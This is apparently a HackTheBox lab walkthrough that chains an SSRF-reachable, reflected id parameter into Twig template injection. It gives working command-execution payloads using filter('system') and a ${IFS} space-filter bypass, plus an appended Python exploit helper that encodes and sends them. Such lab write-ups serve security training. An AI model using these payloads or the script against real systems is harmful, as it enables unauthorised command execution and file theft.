HackTheBox - Server-side Attacks - Skills Assessment Walkthrough


Scenario
You are tasked to perform a security assessment of a client's web application. Apply what you have learned in this module to obtain the flag.
Walkthrough
Accessing the target URL redirects us to the next page:
After browsing the site for a bit, enable Burp's proxy intercept to monitor the HTTP requests.
When the main page loads, we can observe several POST requests being made:
These requests include an api parameter whose value is a URL. That URL points at an address and carries a parameter named id with a value (%3D is the URL-encoded =). The server appears to fetch this URL and process the id value, returning a JSON response containing the id and a corresponding location.
The results are displayed directly on the main page of the web application:
We can test different values to confirm the presence of an SSRF vulnerability, for example by pointing the api parameter at localhost on port 80:
However, we can keep using the current URL and focus on the id parameter, which is particularly interesting because its value is reflected back to us:
Since the id parameter reflects its value back to us, it raises the possibility of another vulnerability: SSTI (Server-Side Template Injection). To test for this, we inject a set of SSTI payloads (for example from PayloadsAllTheThings) into the id parameter and look for any sign that the template engine evaluated them.
And we successfully triggered one:
This confirms an SSTI vulnerability, triggered here by {{3*3}}. {{3*'3'}} also returned 9, which narrows the engine down to Twig or Jinja and in fact points to Twig: Twig casts the string '3' to a number and returns 9, whereas Jinja2 would repeat the string and return 333. We check both anyway.
Let's test for Jinja template injection:
No results were returned.
Let’s try testing for Twig template injection next:
We successfully exploited the SSTI vulnerability and revealed the source code of index.php.
Next, we need Twig-specific payloads to execute commands on the server and retrieve the flag. We will use the following payload, which passes each element of the array to PHP's system() through Twig's filter filter:
{{['<COMMAND>']|filter('system')}}
First, list all files in the root directory using this payload:
{{['ls+/']|filter('system')}}
This returns an error. The error disappears when using ls alone, and replacing + with %20 fails as well, so the problem is the space between the command and its argument rather than the / path itself.
To bypass the space restriction, we can use the shell's ${IFS} variable as a substitute for the space character.
IFS (the internal field separator) defaults to space, tab and newline. Because system() hands the command to /bin/sh, the shell expands ${IFS} and splits ls${IFS}/ into the two words ls and /, so the payload never has to contain a literal space:
{{['ls${IFS}/']|filter('system')}}
We can see it worked, successfully returning all directories and files in the root directory.
Now we can see the flag.txt file, so let's view its contents:
{{['cat${IFS}/flag.txt']|filter('system')}}
And we got the flag 😉
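The same chain, written out as a small helper script. This is an added example and not part of the original walkthrough: it shows how the SSTI payload has to be encoded twice (once for the inner URL that the api parameter points at, once more for the outer POST body), how to fingerprint the engine from what {{3*'3'}} comes back as, and how the ${IFS} substitution is applied to the Twig command payload. The target URL, the internal API path and the parameter names are assumptions; the decode_layers function replays what each server does to the request so the layering can be checked offline.

```python
"""Added example, not the walkthrough author's code.

Helpers for the chain SSRF (api parameter) -> reflected id -> Twig SSTI ->
command execution. TARGET and INTERNAL_API are assumptions; the real lab
host is not reproduced here.
"""
import urllib.request
from urllib.parse import parse_qs, quote, urlencode, urlparse

TARGET = "http://127.0.0.1:8080/"           # assumption: vulnerable front-end
INTERNAL_API = "http://127.0.0.1:8080/api"  # assumption: URL the api parameter fetches


def build_inner_url(payload: str, base: str = INTERNAL_API) -> str:
    """URL the server fetches on our behalf. The id value is encoded once so
    braces, quotes, '*' and '|' survive as query-string characters."""
    return f"{base}?id={quote(payload, safe='')}"


def build_post_body(payload: str) -> str:
    """Outer POST body: api=<inner URL, encoded a second time>. After the
    front-end decodes the body once, the inner URL is still well formed;
    this is why '=' showed up as %3D in the intercepted requests."""
    return urlencode({"api": build_inner_url(payload)})


def decode_layers(body: str) -> str:
    """Replay both decode steps (front-end, then internal API) and return the
    id value as the template engine finally sees it."""
    inner_url = parse_qs(body)["api"][0]          # front-end decodes the body
    return parse_qs(urlparse(inner_url).query)["id"][0]  # internal API decodes its query


def fingerprint(reflected: str) -> str:
    """Classify the engine from the response to {{3*'3'}}."""
    r = reflected.strip()
    if r == "9":
        return "twig"           # Twig casts '3' to a number: 3*'3' == 9
    if r == "333":
        return "jinja2"         # Jinja2/Python repeat the string: 3*'3' == '333'
    if r == "3*'3'":
        return "not vulnerable"  # echoed back untouched
    return "unknown"


def twig_cmd(command: str) -> str:
    """Twig payload that runs `command` through PHP system(). Spaces are
    replaced by ${IFS}, which /bin/sh expands to its default IFS characters
    (space, tab, newline) and then splits on, so the payload never contains a
    literal space. The command goes inside a Twig single-quoted string, so it
    must not contain a single quote itself."""
    if "'" in command:
        raise ValueError("single quotes would break the Twig string literal")
    return "{{['" + command.replace(" ", "${IFS}") + "']|filter('system')}}"


def send(payload: str, url: str = TARGET, timeout: float = 5.0) -> str:
    """POST the payload through the api parameter and return the body.
    Network call; not exercised by the offline checks below."""
    req = urllib.request.Request(
        url, data=build_post_body(payload).encode(), method="POST"
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    probe = "{{3*'3'}}"
    print(build_post_body(probe))
    print("engine guess from a Twig-style reply:", fingerprint("9"))
    print(twig_cmd("cat /flag.txt"))
```

Note that build_post_body encodes the space in `ls /` as %2520 in the outer body, which is what a correctly layered request looks like; twig_cmd still swaps in ${IFS} so the payload works whether or not the space survives the two decodes.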